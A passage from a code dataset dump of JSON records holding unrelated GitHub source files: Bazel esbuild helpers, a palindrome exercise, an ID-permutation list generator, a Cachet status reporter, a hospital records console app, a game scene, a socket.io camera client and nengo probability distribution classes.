км.\")\n","repo_name":"Elvirshine/gb","sub_path":"python/hw_01/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73317021263","text":"\"\"\"\nUtility helper functions for the esbuild rule\n\"\"\"\n\nTS_EXTENSIONS = [\"ts\", \"tsx\"]\nJS_EXTENSIONS = [\"js\", \"jsx\", \"mjs\"]\nALLOWED_EXTENSIONS = JS_EXTENSIONS + TS_EXTENSIONS\n\ndef desugar_entry_point_names(entry_point, entry_points):\n \"\"\"Users can specify entry_point (sugar) or entry_points (long form).\n\n This function allows our code to treat it like they always used the long form.\n\n It also validates that exactly one of these attributes should be specified.\n\n Args:\n entry_point: the simple argument for specifying a single entry\n entry_points: the long form argument for specifing one or more entry points\n\n Returns:\n the array of entry poitns\n \"\"\"\n if entry_point and entry_points:\n fail(\"Cannot specify both entry_point and entry_points\")\n if not entry_point and not entry_points:\n fail(\"One of entry_point or entry_points must be specified\")\n if entry_point:\n return [entry_point]\n return entry_points\n\ndef write_args_file(ctx, args):\n args_file = ctx.actions.declare_file(\"%s.args.json\" % ctx.attr.name)\n ctx.actions.write(\n output = args_file,\n content = json.encode(args),\n )\n\n return args_file\n","repo_name":"aspect-build/rules_esbuild","sub_path":"esbuild/private/helpers.bzl","file_name":"helpers.bzl","file_ext":"bzl","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"47"} 
+{"seq_id":"15942770291","text":"s = input()\ndp_matrix = [[True for j in range(len(s))]for i in range(len(s))]\nfor i in range(len(s)-2, -1, -1):\n for j in range(i+1, len(s)):\n if not (s[i] == s[j] and dp_matrix[i+1][j-1]):\n dp_matrix[i][j] = False\nn = int(input())\nfor i in range(n):\n l, r = list(map(int, input().split()))\n l -= 1\n result = 0\n while dp_matrix[l][r-1] == False:\n lastture = l\n for i in range(l, r):\n if dp_matrix[l][i] is True:\n lastture = i\n result += 1\n l = lastture+1\n result += 1\n print(result)\n","repo_name":"hakaorson/CodePractise","sub_path":"Write_test/tencent/秋招第一场/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13437839744","text":"#-*- coding: utf-8 -*-\n#\n#creates a list of all possible combinations alphalower_numeric 4 char\n#you can always change it with like [alphanum = range(a-z)] or someshit, but i didnt want to do that.\n#\n#this script creates a list for termscrape\n#\n#made by \n#\n#\n#\n# ooooo ooooo ooooooooooooo ooooooooo.\n# `888' `888' 8' 888 `8 `888 `Y88.\n# 888 888 888 888 .d88'\n# 888ooooo888 888 888ooo88P'\n# 888 888 888 888\n# 888 888 888 888\n# o888o o888o o888o o888o\n#\n#\n#\nimport itertools\ndef htp():\n alphanum = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"0\"]\n #test = [\"a\",\"b\",\"c\",\"1\",\"2\",\"3\"]\n string = list(itertools.permutations(alphanum, 4))\n file = open(\"list.txt\", \"w\")\n for x in string:\n #print(''.join(x))\n file.write(str(''.join(x))+'\\n')\n file.close()\nhtp()\n","repo_name":"LeoGeo1337/fiche-scrape","sub_path":"charles.py3","file_name":"charles.py3","file_ext":"py3","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33050080836","text":"import os\nfrom datetime import datetime\nimport requests\nimport json\nimport certifi\nimport traceback\n\nclass cachet():\n\n def __init__(self):\n self.cachet_token = os.environ[\"cachet_token\"]\n\n def report(self, method, url, value_dict):\n headers = {\"Content-Type\": \"application/json\", \"X-Cachet-Token\": self.cachet_token}\n req = requests.request(method=method, url=url, json=value_dict, headers=headers, verify=certifi.where())\n return req\n\n def report_login_time(self, milliseconds, login_metric_id):\n data = {\n \"value\": int(milliseconds),\n \"timestamp\": int(datetime.utcnow().timestamp())\n }\n req = self.report(\"POST\", \"https://status.projectalt.is/api/v1/metrics/\" + str(login_metric_id) + \"/points\", data)\n return req\n\n def report_component(self, status_value, component_id):\n if status_value == self.get_component(component_id):\n print(\"Not updating component \" + str(component_id) + \" with the same value\")\n return\n data = {\n \"status\": int(status_value)\n }\n req = self.report(\"PUT\", \"https://status.projectalt.is/api/v1/components/\" + str(component_id), data)\n return req\n\n @staticmethod\n def get_component(component_id):\n req = requests.get(\"https://status.projectalt.is/api/v1/components/\" + str(component_id))\n try:\n jsn = json.loads(req.text)\n return int(jsn[\"data\"][\"status\"])\n except:\n print(\"Cachet API is dying with code \" + str(req.status_code) + \": \" + req.text)\n return 
0","repo_name":"philicheese2003/ToontownProjectAltisServer","sub_path":"Panda3D-1.10.0/direct/cachet.py","file_name":"cachet.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"43199765564","text":"\r\n\r\nimport modules\r\n\r\nDATA_DOCTORS_FILE = \"doctors.txt\"\r\nDATA_PATIENTS_FILE = \"patients.txt\"\r\n\r\n# doctors function \r\ndef display_dr_menu():\r\n # display menu\r\n print()\r\n print(\"ARH Management System\")\r\n print(\" Doctor's Menu\\n\")\r\n print(\"1 - List of Doctors \")\r\n print(\"2 - Search for Doctor by ID \")\r\n print(\"3 - Search for Doctor by Name/Partial Name \")\r\n print(\"4 - Add new Doctor \")\r\n print(\"5 - Edit Doctor Info \")\r\n print(\"0 - Return to Main Menu\")\r\n\r\ndef manage_dr():\r\n\r\n display_dr_menu()\r\n # initialize menu option\r\n menu_option = \"11\"\r\n dr_list = []\r\n # Read the list of doctors from file and store it in the dr_list variable\r\n dr_list = read_doctors_file()\r\n # loop until user enters 0 to exit\r\n while menu_option != \"0\":\r\n menu_option = input(\"Enter option: \")\r\n if menu_option == \"1\":\r\n print()\r\n display_list_of_drs(dr_list)\r\n elif menu_option == \"2\":\r\n print()\r\n dr_id = int(input(\"Enter the doctor ID: \"))\r\n if find_dr_by_id(dr_id, dr_list) == -1:\r\n print(f\"Doctor with ID {dr_id} not found\")\r\n elif menu_option == \"3\":\r\n print()\r\n match_dr_by_name(dr_list)\r\n elif menu_option == \"4\":\r\n print()\r\n add_dr_to_list(dr_list)\r\n elif menu_option == \"5\":\r\n print()\r\n edit_dr_info(dr_list)\r\n # print doctor list\r\n display_list_of_drs(dr_list)\r\n display_dr_menu()\r\n # write doctors file\r\n write_drs_list_to_file(dr_list)\r\n\r\ndef read_doctors_file():\r\n #This function reads the data from the doctors.txt file and returns a list of doctor objects.\r\n dr_list = []\r\n with open(DATA_DOCTORS_FILE, \"r\") as dr_file:\r\n\r\n next(dr_file) \r\n for line in dr_file:\r\n line = line.strip()\r\n dr_data = line.split(\"_\")\r\n dr_obj = modules.Doctor(dr_data[0], dr_data[1], dr_data[2], dr_data[3], dr_data[4], dr_data[5])\r\n dr_list.append(dr_obj)\r\n return dr_list\r\n\r\ndef find_dr_by_id(dr_id, dr_list):\r\n#This function searches the doctor list for a doctor with the given ID\r\n for dr in dr_list:\r\n if dr.get_id() == dr_id:\r\n print(dr)\r\n return dr\r\n return -1\r\n\r\ndef match_dr_by_name(dr_list):\r\n # A function to match the doctor by their name\r\n output_list = []\r\n input_name = input(\"Enter the doctor name: \")\r\n nbr_matches = 0\r\n # Loop through the doctor list\r\n for dr in dr_list:\r\n if input_name.lower() in dr.get_name().lower():\r\n output_list.append(dr)\r\n nbr_matches += 1\r\n if nbr_matches == 0:\r\n print(\"Not found.\")\r\n else:\r\n display_list_of_drs(output_list)\r\n\r\ndef display_list_of_drs(dr_list):\r\n \r\n # print header\r\n print(f\"{'ID':<5s} {'Name':20s} {'Specialist':20s} {'Schedule':10s} {'Qualifications':15s} {'Room Nbr':>10s}\")\r\n for dr in dr_list:\r\n print(dr)\r\n\r\ndef get_new_dr_info():\r\n \r\n dr_name = input(\"Enter Dr name: \")\r\n dr_specialty = input(\"Enter Dr specialty: \")\r\n dr_schedule = input(\"Enter Dr schedule: \")\r\n dr_qualifications = input(\"Enter Dr qualifications: \")\r\n dr_room_number = input(\"Enter Dr room number: \")\r\n dr = modules.Doctor(0, dr_name, dr_specialty, dr_schedule, dr_qualifications, dr_room_number)\r\n return dr\r\n\r\ndef add_dr_to_list(dr_list):\r\n \r\n dr_id = 
int(input(\"Enter Dr ID: \"))\r\n dr = find_dr_by_id(dr_id, dr_list)\r\n if dr != -1:\r\n print(f'Doctor with id {dr_id} already exists - cannot add')\r\n else:\r\n dr = get_new_dr_info()\r\n dr.set_id(dr_id)\r\n dr_list.append(dr)\r\n print(f'Doctor with id {dr_id} successfully added')\r\n\r\ndef write_drs_list_to_file(dr_list):\r\n #This function takes in a list of doctor objects and writes their attributes to a file in a specific format\r\n#The file is opened in write mode, meaning it will overwrite any existing content\r\n with open(DATA_DOCTORS_FILE, \"w\") as dr_file:\r\n dr_file.write(\"ID_Name_Specialist_Schedule_Qualifications_Room Nbr\\n\")\r\n for dr in dr_list:\r\n dr_file.write(f'{dr.get_id()}_{dr.get_name()}_{dr.get_specialty()}_{dr.get_schedule()}_{dr.get_qualification()}_{dr.get_room_number()}\\n')\r\n\r\ndef edit_dr_info(dr_list):\r\n \r\n dr_id = int(input(\"Enter the doctor ID to edit: \"))\r\n new_dr = find_dr_by_id(dr_id, dr_list)\r\n if new_dr == -1:\r\n print(\"Doctor ID not found.\")\r\n else:\r\n new_dr = get_new_dr_info()\r\n new_dr.set_id(dr_id)\r\n # edit dr information\r\n for dr in dr_list:\r\n if dr.get_id() == dr_id:\r\n dr.set_name(new_dr.get_name())\r\n dr.set_specialty(new_dr.get_specialty())\r\n dr.set_schedule(new_dr.get_schedule())\r\n dr.set_qualification(new_dr.get_qualification())\r\n dr.set_room_number(new_dr.get_room_number())\r\n print(f\"Dr with ID {dr_id} successfully modified.\")\r\n\r\n# Patients Management functions\r\ndef display_patients_menu():\r\n # display menu\r\n print()\r\n print(\"ARH Management System\")\r\n print(\" Patinets's Menu\\n\")\r\n print(\"1 - List of Patients \")\r\n print(\"2 - Search for Patients by ID \")\r\n print(\"3 - Add new Patients \")\r\n print(\"4 - Edit Patients Info \")\r\n print(\"0 - Return to Main Menu\")\r\n\r\ndef manage_patients():\r\n \r\n\r\n # display menu\r\n display_patients_menu()\r\n # initialize menu option\r\n menu_option = \"11\"\r\n # initialize patients list\r\n list_of_patients = []\r\n # read patinets file\r\n list_of_patients = read_patients_file()\r\n # loop until user enters 0 to exit\r\n while menu_option != \"0\":\r\n menu_option = input(\"Enter option: \")\r\n if menu_option == \"1\":\r\n display_patient_list(list_of_patients)\r\n elif menu_option == \"2\":\r\n patients_id = int(input(\"Enter the patients ID: \"))\r\n if find_patients_by_id(patients_id, list_of_patients) == -1:\r\n print(f\"Patients with ID {patients_id} not found\")\r\n elif menu_option == \"3\":\r\n add_patient_to_list(list_of_patients)\r\n elif menu_option == \"4\":\r\n edit_Patient_info(list_of_patients)\r\n # print patients list\r\n display_patient_list(list_of_patients)\r\n display_patients_menu()\r\n # write doctors file\r\n write_patients_file(list_of_patients)\r\n\r\ndef read_patients_file():\r\n #This function reads the patients' data from a file and creates a list of patient objects.\r\n patients_list = []\r\n with open(DATA_PATIENTS_FILE, \"r\") as patients_file:\r\n # avoid the first header line\r\n next(patients_file)\r\n for line in patients_file:\r\n line = line.strip()\r\n #A new Patient object is created using the data, and then appended to the patients_list.\r\n patients_data = line.split(\"_\")\r\n patients_obj = modules.Patient(\r\n patients_data[0], patients_data[1], patients_data[2], patients_data[3], patients_data[4], )\r\n patients_list.append(patients_obj)\r\n return patients_list\r\n\r\ndef find_patients_by_id(patients_id, patients_list):\r\n #This function takes a patient ID and a list 
of patient objects as input.\r\n#It then searches the list of patient objects to find the patient with the given ID.\r\n for patients in patients_list:\r\n if patients.get_id() == patients_id:\r\n print(patients)\r\n return patients\r\n return -1\r\n\r\ndef display_patient_list(display_list_of_patients):\r\n#This function takes a list of patient objects as input.\r\n#It then iterates through the list and prints the details of each patient object.\r\n for patients in display_list_of_patients:\r\n print(patients)\r\n\r\ndef get_new_Patient_info():\r\n \r\n patients_name = input(\"Enter patient name: \")\r\n patients_diagnosis = input(\"Enter patient diagnosis: \")\r\n patients_gender = input(\"Enter patient gender: \")\r\n patients_age = input(\"Enter patient age: \")\r\n patient = modules.Patient(\r\n 0, patients_name, patients_diagnosis, patients_gender, patients_age)\r\n return patient\r\n\r\ndef add_patient_to_list(patient_list):\r\n # This function adds a new patient to the patient list.\r\n# It takes a list of patients as input.\r\n patient_id = int(input(\"Enter Patient ID: \"))\r\n patient = find_patients_by_id(patient_id, patient_list)\r\n if patient != -1:\r\n print(f'Patient with id {patient_id} already exists - cannot add')\r\n else:\r\n patient = get_new_Patient_info()\r\n patient.set_id(patient_id)\r\n patient_list.append(patient)\r\n print(f'Patient with id {patient_id} successfully added')\r\n\r\ndef write_patients_file(patients_list):\r\n # This function writes the patient list to the patient data file.\r\n# It takes a list of patients as input.\r\n with open(DATA_PATIENTS_FILE, \"w\") as patients_file:\r\n patients_file.write(\"ID_Name_Diagnosis_Gender_Age\\n\")\r\n for patient in patients_list:\r\n patients_file.write(\r\n f'{patient.get_id()}_{patient.get_name()}_{patient.get_diagnosis()}_{patient.get_gender()}_{patient.get_age()}\\n')\r\n\r\ndef edit_Patient_info(patients_list):\r\n patients_id = int(input(\"Enter the Patient ID to edit: \"))\r\n found = False\r\n for patient in patients_list:\r\n if patient.get_id() == patients_id:\r\n found = True\r\n new_patient = get_new_Patient_info()\r\n new_patient.set_id(patients_id)\r\n patient.set_name(new_patient.get_name())\r\n patient.set_diagnosis(new_patient.get_diagnosis())\r\n patient.set_gender(new_patient.get_gender())\r\n patient.set_age(new_patient.get_age())\r\n print(f\"Patient with ID {patients_id} successfully modified.\")\r\n break\r\n if not found:\r\n print(\"Patient ID not found.\")\r\n\r\ndef display_main_menu():\r\n print(\"\\nARH Management System\\n Main Menu\\n\\n1 - Doctor \\n2 - Patient \\n0 - Close Application\")\r\n\r\ndef main():\r\n \r\n main_menu_option = \"\"\r\n\r\n display_main_menu()\r\n\r\n while main_menu_option != \"0\":\r\n\r\n main_menu_option = input(\"Enter option: \")\r\n if main_menu_option == \"1\":\r\n manage_dr()\r\n display_main_menu()\r\n elif main_menu_option == \"2\":\r\n manage_patients()\r\n display_main_menu()\r\n\r\n print(\"ARH Management System successfully closed\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n exit(0)","repo_name":"Arshpreet77/PROJECT","sub_path":"management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":10563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19101422087","text":"#-coding:utf-8-\nfrom Libraries.Scene import Scene\n\nclass Room(Scene):\n def __init__(self,game):\n self.Game = game\n Scene.__init__(self,self.Game)\n 
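# build the room: background and foreground art, the walkable map and the exit back to the blacksmith\n 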
self.setBackground('WATERMILL_BACKGROUND')\n self.setForeground('WATERMILL_FOREGROUND')\n self.addVisibleElement(self.loadElement('Map'))\n self.setMap('bar.map')\n self.addExit(490,305,110,180,(550,500),\"blacksmith\",'NORTH')\n self.enter()\n \n def enter(self):\n self.Game.AudioController.playMusic('NOTEXPECTED')\n self.Game.AudioController.playAmbienceSound('AMBI_WATER')\n self.setInsertPoint((550,500))\n \n self.setFarthestPoint(415)\n self.setClosestPoint(715)\n self.setFarthestScale(50)\n self.setClosestScale(100)\n\n self.Game.Player.scriptWalk((550,570))\n self.show()","repo_name":"fordream/subterranean-ng","sub_path":"Assets/Scenes/watermill.py","file_name":"watermill.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30389229828","text":"# LIST COMPREHENSION\n# perform action on each item in the list\n\nimport random\nimport math\n\n\n# double each i to be put to the list\n# perform e.g. a calculation on the generated range\nevenList = [i * 2 for i in range(11)]\n\nfor i in evenList:\n print(i)\n\nprint()\nprint()\n\n\nnumList = [1, 2, 3, 4, 5]\n\n# multidimensional list\n# perform actions in list on each item in the list of values\n# for each value create a list with all calculations (action)\nlistOfValues = [[math.pow(m, 2), math.pow(m, 3), math.pow(m, 4)]\n for m in numList]\n\nfor i in listOfValues:\n print(i)\n\nprint()\n","repo_name":"s3icc0/Tutorials","sub_path":"DBTut/Lesson 006 Lists/pytut_006_004.py","file_name":"pytut_006_004.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32557001626","text":"import asyncio\nimport socketio\nimport json\nimport cv2\nfrom greppelState import greppelState\nimport base64\n\n# cam = cv2.VideoCapture('/dev/video0') # LINUX\n# cam = cv2.VideoCapture(0, cv2.CAP_DSHOW) # Windows\nsio = socketio.AsyncClient()\nencode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 40]\nstate = greppelState(\n temp=69,\n num=30\n)\n\n\n@sio.event\nasync def connect():\n print('connection established')\n task = sio.start_background_task(background_task)\n # await send_cam()\n\n\n@sio.event\nasync def reconnect():\n print('reconnected')\n task = sio.start_background_task(background_task)\n\n\n# Runs continuously after the startup tasks.\nasync def background_task():\n try:\n while True:\n await send_state()\n await send_cam()\n # await send_state()\n await asyncio.sleep(0.2)\n except Exception as e:\n print(e)\n\n\n# Sends telemetry to the server\nasync def send_state():\n state.getState()\n\n dummydata = json.dumps(state.__dict__)\n await sio.emit(\"greppelstate\", dummydata)\n\n\n# Sends a camera frame to the website\nasync def send_cam():\n # status, frame = cam.read()\n\n frame = cv2.imread('test640.jpg')\n\n # rescale image to send\n scale_percent = 100 # percent of original size\n width = int(frame.shape[1] * scale_percent / 100)\n height = int(frame.shape[0] * scale_percent / 100)\n dim = (width, height)\n img = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n\n # encode to jpg to reduce size, convert to base64\n img_encoded = cv2.imencode('.jpg', img, encode_param)[1]\n data = base64.b64encode(img_encoded)\n\n await sio.emit('image', data)\n\n\n@sio.event\nasync def disconnect():\n print('disconnected from server')\n # cam.release()\n cv2.destroyAllWindows()\n\n\nasync def main():\n await sio.connect('http://greppel.tech:3000')\n await 
sio.wait()\n # cam.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"NonkNick/SocketGreppel","sub_path":"socketIOclient.py","file_name":"socketIOclient.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10629738265","text":"import warnings\n\nimport numpy as np\n\nfrom nengo.exceptions import ValidationError\nfrom nengo.params import (\n BoolParam,\n IntParam,\n NdarrayParam,\n NumberParam,\n Parameter,\n Unconfigurable,\n FrozenObject,\n)\nimport nengo.utils.numpy as npext\n\n\nclass Distribution(FrozenObject):\n \"\"\"A base class for probability distributions.\n\n The only thing that a probabilities distribution need to define is a\n `.Distribution.sample` method. This base class ensures that all\n distributions accept the same arguments for the sample function.\n \"\"\"\n\n def _sample_shape(self, n, d=None):\n \"\"\"Returns output shape for sample method.\"\"\"\n return (n,) if d is None else (n, d)\n\n def sample(self, n, d=None, rng=np.random):\n \"\"\"Samples the distribution.\n\n Parameters\n ----------\n n : int\n Number samples to take.\n d : int or None, optional\n The number of dimensions to return. If this is an int, the return\n value will be of shape ``(n, d)``. If None, the return\n value will be of shape ``(n,)``.\n rng : `numpy.random.mtrand.RandomState`, optional\n Random number generator state.\n\n Returns\n -------\n samples : (n,) or (n, d) array_like\n Samples as a 1d or 2d array depending on ``d``. The second\n dimension enumerates the dimensions of the process.\n \"\"\"\n raise NotImplementedError(\"Distributions should implement sample.\")\n\n\ndef get_samples(dist_or_samples, n, d=None, rng=np.random):\n \"\"\"Convenience function to sample a distribution or return samples.\n\n Use this function in situations where you accept an argument that could\n be a distribution, or could be an ``array_like`` of samples.\n\n Examples\n --------\n\n .. testcode::\n\n from nengo.dists import get_samples\n\n rng = np.random.RandomState(seed=0)\n\n def mean(values, n=100):\n samples = get_samples(values, n=n, rng=rng)\n print(\"%.4f\" % np.mean(samples))\n\n mean([1, 2, 3, 4])\n mean(nengo.dists.Gaussian(0, 1))\n\n .. 
testoutput::\n\n 2.5000\n 0.0598\n\n Parameters\n ----------\n dist_or_samples : `.Distribution` or (n, d) array_like\n Source of the samples to be returned.\n n : int\n Number samples to take.\n d : int or None, optional\n The number of dimensions to return.\n rng : RandomState, optional\n Random number generator.\n\n Returns\n -------\n samples : (n, d) array_like\n\n \"\"\"\n if isinstance(dist_or_samples, Distribution):\n return dist_or_samples.sample(n, d=d, rng=rng)\n return np.array(dist_or_samples)\n\n\nclass PDF(Distribution):\n \"\"\"An arbitrary distribution from a PDF.\n\n Parameters\n ----------\n x : vector_like (n,)\n Values of the points to sample from (interpolated).\n p : vector_like (n,)\n Probabilities of the ``x`` points.\n \"\"\"\n\n x = NdarrayParam(\"x\", shape=\"*\")\n p = NdarrayParam(\"p\", shape=\"*\")\n\n def __init__(self, x, p):\n super().__init__()\n\n psum = np.sum(p)\n if np.abs(psum - 1) > 1e-8:\n raise ValidationError(\n \"PDF must sum to one (sums to %f)\" % psum, attr=\"p\", obj=self\n )\n\n self.x = x\n self.p = p\n if len(self.x) != len(self.p):\n raise ValidationError(\n \"`x` and `p` must be the same length\", attr=\"p\", obj=self\n )\n\n # make cumsum = [0] + cumsum, cdf = 0.5 * (cumsum[:-1] + cumsum[1:])\n cumsum = np.cumsum(p)\n cumsum *= 0.5\n cumsum[1:] = cumsum[:-1] + cumsum[1:]\n self.cdf = cumsum\n\n def sample(self, n, d=None, rng=np.random):\n shape = self._sample_shape(n, d)\n return np.interp(rng.uniform(size=shape), self.cdf, self.x)\n\n\nclass Uniform(Distribution):\n \"\"\"A uniform distribution.\n\n It's equally likely to get any scalar between ``low`` and ``high``.\n\n Note that the order of ``low`` and ``high`` doesn't matter;\n if ``low < high`` this will still work, and ``low`` will still\n be a closed interval while ``high`` is open.\n\n Parameters\n ----------\n low : Number\n The closed lower bound of the uniform distribution; samples >= low\n high : Number\n The open upper bound of the uniform distribution; samples < high\n integer : boolean, optional\n If true, sample from a uniform distribution of integers. In this case,\n low and high should be integers.\n \"\"\"\n\n low = NumberParam(\"low\")\n high = NumberParam(\"high\")\n integer = BoolParam(\"integer\")\n\n def __init__(self, low, high, integer=False):\n super().__init__()\n self.low = low\n self.high = high\n self.integer = integer\n\n def sample(self, n, d=None, rng=np.random):\n shape = self._sample_shape(n, d)\n if self.integer:\n return rng.randint(low=self.low, high=self.high, size=shape)\n else:\n return rng.uniform(low=self.low, high=self.high, size=shape)\n\n\nclass Gaussian(Distribution):\n \"\"\"A Gaussian distribution.\n\n This represents a bell-curve centred at ``mean`` and with\n spread represented by the standard deviation, ``std``.\n\n Parameters\n ----------\n mean : Number\n The mean of the Gaussian.\n std : Number\n The standard deviation of the Gaussian.\n\n Raises\n ------\n ValidationError if std is <= 0\n\n \"\"\"\n\n mean = NumberParam(\"mean\")\n std = NumberParam(\"std\", low=0, low_open=True)\n\n def __init__(self, mean, std):\n super().__init__()\n self.mean = mean\n self.std = std\n\n def sample(self, n, d=None, rng=np.random):\n shape = self._sample_shape(n, d)\n return rng.normal(loc=self.mean, scale=self.std, size=shape)\n\n\nclass Exponential(Distribution):\n \"\"\"An exponential distribution (optionally with high values clipped).\n\n If ``high`` is left to its default value of infinity, this is a standard\n exponential distribution. 
If ``high`` is set, then any sampled values at\n or above ``high`` will be clipped so they are slightly below ``high``.\n This is useful for thresholding.\n\n The probability distribution function (PDF) is given by::\n\n | 0 if x < shift\n p(x) = | 1/scale * exp(-(x - shift)/scale) if x >= shift and x < high\n | n if x == high - eps\n | 0 if x >= high\n\n where ``n`` is such that the PDF integrates to one, and ``eps`` is an\n infinitesimally small number such that samples of ``x`` are strictly less\n than ``high`` (in practice, ``eps`` depends on floating point precision).\n\n Parameters\n ----------\n scale : float\n The scale parameter (inverse of the rate parameter lambda). Larger\n values make the distribution narrower (sharper peak).\n shift : float, optional\n Amount to shift the distribution by. There will be no values smaller\n than this shift when sampling from the distribution.\n high : float, optional\n All values larger than or equal to this value will be clipped to\n slightly less than this value.\n \"\"\"\n\n scale = NumberParam(\"scale\", low=0, low_open=True)\n shift = NumberParam(\"shift\")\n high = NumberParam(\"high\")\n\n def __init__(self, scale, shift=0.0, high=np.inf):\n super().__init__()\n self.scale = scale\n self.shift = shift\n self.high = high\n\n def sample(self, n, d=None, rng=np.random):\n shape = self._sample_shape(n, d)\n x = rng.exponential(self.scale, shape) + self.shift\n high = np.nextafter(self.high, np.asarray(-np.inf, dtype=x.dtype))\n return np.clip(x, self.shift, high)\n\n\nclass UniformHypersphere(Distribution):\n \"\"\"Uniform distribution on or in an n-dimensional unit hypersphere.\n\n Sample points are uniformly distributed across the volume (default) or\n surface of an n-dimensional unit hypersphere.\n\n Parameters\n ----------\n surface : bool, optional\n Whether sample points should be distributed uniformly\n over the surface of the hyperphere (True),\n or within the hypersphere (False).\n min_magnitude : Number, optional\n Lower bound on the returned vector magnitudes (such that they are in\n the range ``[min_magnitude, 1]``). Must be in the range [0, 1).\n Ignored if ``surface`` is ``True``.\n \"\"\"\n\n surface = BoolParam(\"surface\")\n min_magnitude = NumberParam(\"min_magnitude\", low=0, high=1, high_open=True)\n\n def __init__(self, surface=False, min_magnitude=0):\n super().__init__()\n if surface and min_magnitude > 0:\n warnings.warn(\"min_magnitude ignored because surface is True\")\n self.surface = surface\n self.min_magnitude = min_magnitude\n\n def sample(self, n, d=None, rng=np.random):\n if d is None or d < 1: # check this, since other dists allow d = None\n raise ValidationError(\"Dimensions must be a positive integer\", \"d\")\n\n samples = rng.randn(n, d)\n samples /= npext.norm(samples, axis=1, keepdims=True)\n\n if self.surface:\n return samples\n\n # Generate magnitudes for vectors from uniform distribution.\n # The (1 / d) exponent ensures that samples are uniformly distributed\n # in n-space and not all bunched up at the centre of the sphere.\n samples *= rng.uniform(low=self.min_magnitude ** d, high=1, size=(n, 1)) ** (\n 1.0 / d\n )\n\n return samples\n\n\nclass Choice(Distribution):\n \"\"\"Discrete distribution across a set of possible values.\n\n The same as Numpy random's `~numpy.random.mtrand.RandomState.choice`,\n except can take vector or matrix values for the choices.\n\n Parameters\n ----------\n options : (N, ...) array_like\n The options (choices) to choose between. 
The choice is always done\n along the first axis, so if ``options`` is a matrix, the options are\n the rows of that matrix.\n weights : (N,) array_like, optional\n Weights controlling the probability of selecting each option. Will\n automatically be normalized. If None, weights be uniformly distributed.\n \"\"\"\n\n options = NdarrayParam(\"options\", shape=(\"*\", \"...\"))\n weights = NdarrayParam(\"weights\", shape=(\"*\"), optional=True)\n\n def __init__(self, options, weights=None):\n super().__init__()\n self.options = options\n self.weights = weights\n\n weights = np.ones(len(self.options)) if self.weights is None else self.weights\n if len(weights) != len(self.options):\n raise ValidationError(\n \"Number of weights (%d) must match number of options (%d)\"\n % (len(weights), len(self.options)),\n attr=\"weights\",\n obj=self,\n )\n if not all(weights >= 0):\n raise ValidationError(\n \"All weights must be non-negative\", attr=\"weights\", obj=self\n )\n total = float(weights.sum())\n if total <= 0:\n raise ValidationError(\n \"Sum of weights must be positive (got %f)\" % total,\n attr=\"weights\",\n obj=self,\n )\n self.p = weights / total\n\n @property\n def dimensions(self):\n return np.prod(self.options.shape[1:])\n\n def sample(self, n, d=None, rng=np.random):\n if d is not None and self.dimensions != d:\n raise ValidationError(\n \"Options must be of dimensionality %d \"\n \"(got %d)\" % (d, self.dimensions),\n attr=\"options\",\n obj=self,\n )\n\n i = np.searchsorted(np.cumsum(self.p), rng.rand(n))\n return self.options[i]\n\n\nclass Samples(Distribution):\n \"\"\"A set of samples.\n\n This class is a subclass of `.Distribution` so that it can be used in any\n situation that calls for a `.Distribution`. However, the call to\n `.Distribution.sample` must match the dimensions of the samples or\n a `.ValidationError` will be raised.\n\n Parameters\n ----------\n samples : (n, d) array_like\n ``n`` and ``d`` must match what is eventually passed to\n `.Distribution.sample`.\n \"\"\"\n\n samples = NdarrayParam(\"samples\", shape=(\"...\",))\n\n def __init__(self, samples):\n super().__init__()\n self.samples = samples\n\n def sample(self, n, d=None, rng=np.random):\n samples = np.array(self.samples)\n shape = (n,) if d is None else (n, d)\n\n if d is None:\n samples = samples.squeeze()\n\n if d is not None and samples.ndim == 1:\n samples = samples[..., np.newaxis]\n\n if samples.shape[0] != shape[0]:\n raise ValidationError(\n \"Wrong number of samples requested; got \"\n \"%d, should be %d\" % (n, samples.shape[0]),\n attr=\"samples\",\n obj=self,\n )\n elif d is None and len(samples.shape) != 1:\n raise ValidationError(\n \"Wrong sample dimensionality requested; got \"\n \"'None', should be %d\" % (samples.shape[1],),\n attr=\"samples\",\n obj=self,\n )\n elif d is not None and samples.shape[1] != shape[1]:\n raise ValidationError(\n \"Wrong sample dimensionality requested; got \"\n \"%d, should be %d\" % (d, samples.shape[1]),\n attr=\"samples\",\n obj=self,\n )\n\n return samples\n\n\nclass SqrtBeta(Distribution):\n \"\"\"Distribution of the square root of a Beta distributed random variable.\n\n Given ``n + m`` dimensional random unit vectors, the length of subvectors\n with ``m`` elements will be distributed according to this distribution.\n\n Parameters\n ----------\n n: int\n Number of subvectors.\n m: int, optional\n Length of each subvector.\n\n See also\n --------\n nengo.dists.SubvectorLength\n \"\"\"\n\n n = 